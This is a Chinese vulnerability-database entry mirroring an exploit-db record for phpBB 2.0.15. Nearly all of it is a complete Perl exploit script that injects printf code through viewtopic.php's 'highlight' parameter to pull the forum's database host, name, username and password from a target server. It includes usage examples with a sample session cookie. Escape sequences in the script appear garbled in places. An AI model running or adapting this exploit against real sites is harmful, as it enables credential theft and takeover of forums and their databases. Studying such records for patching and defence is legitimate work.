phpBB 2.0.15 – ‘highlight’ Database Authentication Details-安全小百科

phpBB 2.0.15 – ‘highlight’ Database Authentication Details

漏洞ID	1055216	漏洞类型
发布时间	2005-07-03	更新时间	2005-07-03
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	PHP	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/1080

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#!/usr/bin/perl

# tested and working /str0ke

#        ********************************************************************
#       **********************************************************************
#      ****                                                                 **
#     ***      ******       *******************                             **
#    ***    ***   ****   ***********************                            **
#   ***   ***     ****                       ****      *   ***    *****     **
#  ***   ***      ***                ***     ***      *  **  **   **        **
# ***   ***                         ***      **         **   **  **         **
#***   ***                          ***    ***          **   **  *****      **
#**   ***                          ***  ****           **   **      **      **
#**   ***       ***  ***   ******* *******             **  ***      **      **
#**   ***      ***   ***  **      *** ***              **  **  **  **       **
#**  ***      ***   ***  **      ***  ***               ***   *****         **
#**   ***     ***   *** **       ***  ***                                   **
#**   ****   ***    ****        ***   ***                                   **
#**     *******    ****   ********     ***********************************  **
#**         ***                                                             **
#**        ***                                                              **
#**                                                                         **
#**      phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability     **
#**      This exploit gives the user all the details about the database     **
#**      connection such as database host, username, password and           **
#**      database name.                                                     **
#**                                                                         **
#**              Written by SecureD,  gvr.secured<AT>gmail<DOT>com,2005     **
#**                                                                         **
#**      Greetings to GvR, Jumento, PP, CKrew & friends      		        **
#**                                                                         **
#***************************************************************************** 
# ***************************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+rn";
print "|           PhpBB 2.0.15 Database Authentication Details Exploit        |rn";
print "|                 By SecureD gvr.secured<AT>gmail<DOT>com               |rn";
print "+-----------------------------------------------------------------------+rn";

if (@ARGV < 3)
{
print "Usage:rn";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRINGrnrn";
print "SERVER         - Server where PhpBB is installed.rn";
print "DIR            - PHPBB directory or / for no directory.rn";
print "THREADID       - Id of an existing thread.rn";
print "COOKIESTRING   - Optional, cookie string of the http request.rn";
print "                 Use this when a thread needs authentication for viewingrn";
print "                 You can use Firefox in combination with "Live HTTPrn";
print "                 Headers" to get this cookiestring.rnrn";
print "Example 1 (with cookiestring):rn";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09" rnrn";
print "Example 2 (without cookiestring):rn";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 rn";
exit();
}

$serv 		= $ARGV[0];
$dir 		= $ARGV[1];
$threadid 	= $ARGV[2];
$cookie 	= $ARGV[3];

$serv 		=~ s/http:////ge;
$delimit 	= "GvRSecureD";

$sploit	 = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "$dbhost.";
$sploit .= "$delimit.";
$sploit .= "$dbname.";
$sploit .= "$delimit.";
$sploit .= "$dbuser.";
$sploit .= "$delimit.";
$sploit .= "$dbpasswd.";
$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.nn";

print "[+] Connecting      OKn";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1rn";
print $sock "Host: $servrn";
if ( defined $cookie) {
	print $sock "Cookie: $cookie rn";
}
print $sock "Connection: closernrn";


$succes = 0;

while ($answer = <$sock>) {
	$delimitIndex = index $answer, $delimit;
	if ($delimitIndex >= 0) {
		$succes = 1;
		$urlIndex = index $answer, "href";
		if ($urlIndex < 0){
			$answer = substr($answer, length($delimit));
			$length = 0;
			while (length($answer) > 0) {
				$nex = index($answer, $delimit);
				if ($nex > 0) {
					push(@array, substr($answer, 0, $nex));
					$answer = substr($answer, $nex + length($delimit), length($answer));
				} else {
					$answer= "";
				}
			}
		}
	}
}

close($sock);

if ($succes == 1) {
	print "OKn";
	sleep(1);
	print "[+] Database Host:  " . $array[0] . "n";
	sleep(1);
	print "[+] Database Name:  " . $array[1] . "n";
	sleep(1);
	print "[+] Username:       " . $array[2] . "n";
	sleep(1);
	print "[+] Password:       " . $array[3] . "n";
	sleep(1);
} else {
	print "FAILEDn";
}

# milw0rm.com [2005-07-03]

相关推荐: X-News Insecure User Database Permissions Vulnerability

X-News Insecure User Database Permissions Vulnerability 漏洞ID 1102312 漏洞类型 Design Error 发布时间 2002-03-13 更新时间 2002-03-13 CVE编号 N/A C…

文章版权归作者所有，未经允许请勿转载。

THE END